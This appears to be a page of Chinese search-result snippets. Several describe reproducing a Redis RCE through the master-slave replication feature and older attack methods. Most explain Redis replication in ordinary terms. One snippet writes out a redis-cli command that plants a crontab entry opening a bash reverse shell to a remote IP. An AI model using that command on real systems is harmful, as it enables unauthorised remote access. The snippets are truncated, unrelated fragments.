0x00 前言 最近期末考试，博客好久没有更新了，这段时间爆了三四个洞，趁着还没去实习，抓紧复现一下，这次复现的是Redis的RCE，复现过程中也遇到很多问题，记录下来和大家分享一下 0x01 拉取镜像 docker确实是个好东西，有了它复现节省不少时间，首先拉取一个5.0镜像 ...

攻击场景： 实际上就是通过主从特性来 同步传输数据，同时利用模块加载来加载恶意的用来进行命令执行的函数，从而进行rce redis之前的攻击方法有 1.写shell 但是对于网站根目录而言，redis不一定据有写权限 2.root权限写crontab或者ssh ...

　　未授权无需认证访问内部数据库。 利用计划任务反弹shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...

主从复制概述 在Redis客户端通过info replication可以查看与复制相关的状态，对于了解主从节点的当前状态，以及解决出现的问题都会有帮助。 主从复制，是指将一台Redis服务器的数据，复制到其他的Redis服务器。前者称为主节点(master/leader)，后者称为从节点 ...

一、简介 Redis支持将数据同步到多台slave上，这种特性对提高读取性能非常有益 1）master可以有多台slave 2) 除了多个slave连到相同master外，slave也可以连接到其它slave形成图状结构 3）主从复制不会阻塞master,也就是说当一个或多个slave ...

大家可以先看这篇文章ASP.NET Redis 开发对Redis有个初步的了解 Redis的主从复制功能非常强大，一个master可以拥有多个slave，而一个slave又可以拥有多个slave，如此下去，形成了强大的多级服务器集群架构。 在master上执行写操作，在slave上面 ...

Redis 主从复制是指：将一台 Redis 服务器的数据复制到其它的 Redis 服务器，前者所在的 Redis 服务器也被称为 “主节点”（Master / Leader），后者则被称为 “从节点”（Slave / Follower）。数据从主节点复制到从节点，主节点的主要任务是实现写入数据 ...

最近在看付磊，张益军老师的《Redis开发与运维》。学到了很多，也遇到了很多坑，这里我想把比较重要的主从复制这一章节，我把自己的理解与实践记录下来，方便自己的学习，也为社区做一点贡献。 (1)：一主二仆 概念： 主从复制最经典的结构就是 "一主二仆"。即一个master主机，两个slave ...